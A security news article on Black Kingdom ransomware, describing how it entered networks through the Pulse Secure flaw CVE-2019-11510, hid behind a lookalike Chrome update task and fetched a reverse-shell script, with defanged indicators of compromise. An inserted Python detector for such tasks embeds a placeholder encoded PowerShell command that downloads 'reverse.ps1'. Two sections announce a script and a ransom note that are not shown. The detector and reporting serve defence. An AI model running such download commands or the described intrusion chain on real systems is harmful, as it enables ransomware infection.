Black Kingdom ransomware operators are targeting organizations using unpatched Pulse Secure VPN software to deploy their malware.

Researchers from security firm REDTEAM reported that operators behind the Black Kingdom ransomware are targeting enterprises by exploiting the CVE-2019-11510 flaw in Pulse Secure VPN software to gain access to the network.

Black Kingdom ransomware was first spotted in late February by security researcher GrujaRS. The malicious code encrypts files and appends the .DEMON extension to the filenames of the encrypted documents.

Early this year, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned organizations that attackers continue to exploit the well-known Pulse Secure VPN vulnerability tracked as CVE-2019-11510.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerability is easily exploitable using publicly available proof-of-concept code. The flaw can be chained with the CVE-2019-11539 remote command injection issue to gain access to private VPN networks.

Malicious Code

The vulnerability was addressed in April 2019, but many organizations delayed updating their servers.

Researchers from security firm REDTEAM discovered that the Black Kingdom ransomware establishes persistence by impersonating a legitimate scheduled task for Google Chrome. The attackers used a name that differs from the legitimate task by a single letter:

GoogleUpdateTaskMachineUSA – Black Kingdom task

GoogleUpdateTaskMachineUA – legitimate Google Chrome task

Redteam researchers published an analysis detailing TTPs and IOC for the Black Kingdom ransomware.

“Attackers gained initial access to the infrastructure via Pulse Secure VPN vulnerability [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510]. For persistence they use a scheduled task [https://attack.mitre.org/techniques/T1053/].” reads the analysis published by Redteam. “Task name is GoogleUpdateTaskMachineUSA, which resembles a legitimate task of Google Chrome that ends with UA, not USA.”

REDTEAM researchers reported that the scheduled task runs a Base64-encoded PowerShell command in a hidden window to fetch a script named “reverse.ps1” that establishes a reverse shell on the infected machine.
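As an added example (not part of the original article or of REDTEAM's analysis), the following Python script shows how a defender could scan a scheduled-task export for the two indicators described above: a task name one edit away from a known legitimate Google Update task, and an action that launches hidden, Base64-encoded PowerShell. The CSV input mimics `schtasks /query /fo CSV /v` output but is constructed, and the encoded command and its 203.0.113.10 address are placeholders, not the real payload.

```python
import base64
import csv
import io
import re

# Legitimate Google Update task names installed by Google Chrome.
LEGIT_TASKS = {"GoogleUpdateTaskMachineUA", "GoogleUpdateTaskMachineCore"}

# Constructed placeholder for the decoded command; PowerShell -EncodedCommand expects UTF-16LE Base64.
PLACEHOLDER_CMD = "Invoke-WebRequest 'http://203.0.113.10/reverse.ps1' -OutFile $env:TEMP\\r.ps1"
ENC = base64.b64encode(PLACEHOLDER_CMD.encode("utf-16le")).decode()

# Constructed sample export, trimmed to three columns of the schtasks CSV layout.
SAMPLE_CSV = """TaskName,Task To Run,Run As User
\\GoogleUpdateTaskMachineUA,C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe /ua /installsource scheduler,SYSTEM
\\GoogleUpdateTaskMachineUSA,powershell.exe -WindowStyle Hidden -EncodedCommand {enc},SYSTEM
\\OneDrive Standalone Update Task,C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe,alice
""".format(enc=ENC)

ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch lookalike names such as ...UA vs ...USA."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def decode_encoded_command(action: str):
    """Return the decoded -EncodedCommand payload of a task action, or None if absent/invalid."""
    m = ENCODED_FLAG.search(action)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_tasks(csv_text: str):
    """Return [(task_name, [reasons])] for tasks that show either indicator."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name, action, reasons = row["TaskName"].lstrip("\\"), row["Task To Run"], []
        if name not in LEGIT_TASKS:
            close = [t for t in LEGIT_TASKS if edit_distance(name, t) <= 2]
            if close:
                reasons.append(f"name resembles legitimate task {close[0]}")
        decoded = decode_encoded_command(action)
        if decoded is not None:
            reasons.append("encoded PowerShell: " + decoded)
        if HIDDEN_FLAG.search(action):
            reasons.append("hidden PowerShell window")
        if reasons:
            findings.append((name, reasons))
    return findings
```

Running `analyze_tasks(SAMPLE_CSV)` flags only GoogleUpdateTaskMachineUSA, with all three reasons; on a real host, feed it the output of `schtasks /query /fo CSV /v` instead of the constructed sample.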

Below is the content of the cversions_cache.ps1 PowerShell script:

The “reverse.ps1” script is hosted at 198.13.49[.]179, an address operated by the hosting provider Choopa that has also been used by other cybercriminal gangs.

“It [198.13.49[.]179] resolves to three domains, the third one being connected to other servers in the U.S. and Italy hosting Android and cryptocurrency mining malware.” reported BleepingComputer.

  • host.cutestboty.com
  • keepass.cutestboty.com
  • anno1119.com

Below is the ransom note dropped by the ransomware on the infected hosts. The operators demanded $10,000 worth of Bitcoin to decrypt the files and to prevent them from being destroyed or sold.

Pierluigi Paganini